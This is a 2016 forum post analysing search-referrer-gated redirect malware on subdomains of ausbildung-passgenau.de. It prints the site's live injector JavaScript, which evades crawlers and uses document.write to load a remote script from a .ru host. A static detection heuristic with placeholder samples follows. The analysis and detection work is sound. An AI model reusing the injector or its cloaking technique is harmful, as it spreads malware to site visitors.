Malicious Domains / ausbildung-passgenau.de – a potpourri of badware!
« Last post by neeklamy on March 15, 2016, 09:47:18 pm »
There are a few subdomains at ausbildung-passgenau.de that have pages that, if visited from a search engine results page (so there’s a certain document referrer), will then redirect to a randomised pick of malware, fake anti-virus and advertising sites.
Interestingly, it looks like only pages at the subdomains are infected. These are a few of the subdomains:
- fullfilescenter.ausbildung-passgenau.de
- newfiles2016.ausbildung-passgenau.de
- fastwindows2016.ausbildung-passgenau.de
This is the JavaScript doing the dirty work:
Code:
<script type="text/javascript">
(0 <= window.navigator.userAgent.indexOf("Rambler")
|| 0 <= window.navigator.userAgent.indexOf("Yandex")
|| 0 <= window.navigator.userAgent.indexOf("Google")
|| 0 <= window.navigator.userAgent.indexOf("Yaho")
|| 0 <= window.navigator.userAgent.indexOf("Googlebot")
|| 0 <= window.navigator.userAgent.indexOf("Turtle")) && Break();
var ref = document.referrer;
if (ref.length != 0) {
    if ((ref.indexOf("yandex.") > 0 && ref.indexOf("text=") > 0)
        || (ref.indexOf("google.") > 0)
        || ref.indexOf("rambler.") > 0
        || ref.indexOf("bing.") > 0
        || ref.indexOf("mail.") > 0
        || ref.indexOf("yahoo.") > 0
        || ref.indexOf("msn.") > 0
        || ref.indexOf("live.") > 0
        || ref.indexOf("vk.") > 0
        || showme == 'force') {
        document.write('<sc' + 'ript type="text/javascript" src="http://d2gyAAiuYBY2TUpxpe.scriptserver.ru/indianajones/index_download.js"></sc' + 'ript>');
    }
}
</script>
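A static check for this kind of referrer-gated injector, added here as an example and not part of the original post: it scores a script on the traits visible above (search-engine referrer tests, crawler user-agent tests, a split script tag, an external script written with document.write). The function name, the indicator labels, the three-indicator threshold and the placeholder host are assumptions made for the illustration.

```javascript
// Added example: static heuristic for search-referrer-gated redirect scripts.
// Indicator names and the "3 of 4" threshold are assumptions made for this illustration.
const SEARCH_TOKENS = ["yandex.", "google.", "rambler.", "bing.", "mail.", "yahoo.", "msn.", "live.", "vk."];

function analyzeScript(source) {
  const findings = [];

  // 1. Referrer gate: document.referrer is read and several search-engine
  //    substrings are tested with indexOf().
  const tokens = SEARCH_TOKENS.filter((t) =>
    new RegExp(`indexOf\\(["']${t.replace(".", "\\.")}["']\\)`).test(source));
  if (/document\.referrer/.test(source) && tokens.length >= 3) findings.push("search-referrer-gate");

  // 2. Crawler evasion: the user agent is compared against bot names.
  if (/userAgent\.indexOf\(["'](Googlebot|Yandex|Rambler)["']\)/.test(source)) findings.push("crawler-ua-check");

  // 3. Script tag split across string literals to dodge naive "<script" matching.
  if (/<sc["']\s*\+\s*["']ript/i.test(source)) findings.push("split-script-tag");

  // 4. External script injected with document.write. Fold 'a' + 'b' into ab first
  //    so the split tag from step 3 becomes visible to the pattern.
  const folded = source.replace(/["']\s*\+\s*["']/g, "");
  const hosts = [];
  const inject = /document\.write\([^)]*?<script[^>]*\bsrc=["']https?:\/\/([^\/"'\s>]+)/gi;
  for (const m of folded.matchAll(inject)) hosts.push(m[1].toLowerCase());
  if (hosts.length > 0) findings.push("document-write-injection");

  return { findings, hosts, suspicious: findings.length >= 3 };
}

// Constructed sample: same shape as the script in the post, placeholder host.
const CLOAKED_SAMPLE = `
0 <= window.navigator.userAgent.indexOf("Googlebot") && Break();
var ref = document.referrer;
if (ref.length != 0) {
  if (ref.indexOf("google.") > 0 || ref.indexOf("bing.") > 0 || ref.indexOf("yahoo.") > 0) {
    document.write('<sc' + 'ript type="text/javascript" src="http://loader.example.invalid/index_download.js"></sc' + 'ript>');
  }
}`;

// Constructed benign sample: reads the referrer for analytics only.
const BENIGN_SAMPLE = `
var ref = document.referrer;
if (ref.indexOf("google.") > 0) { console.log("visit from search"); }`;

console.log(analyzeScript(CLOAKED_SAMPLE));
console.log(analyzeScript(BENIGN_SAMPLE));
```

Because the redirect only fires for visitors arriving from a search result, a crawl that sends no Referer header sees a clean page; a source-level check like this does not depend on triggering the gate.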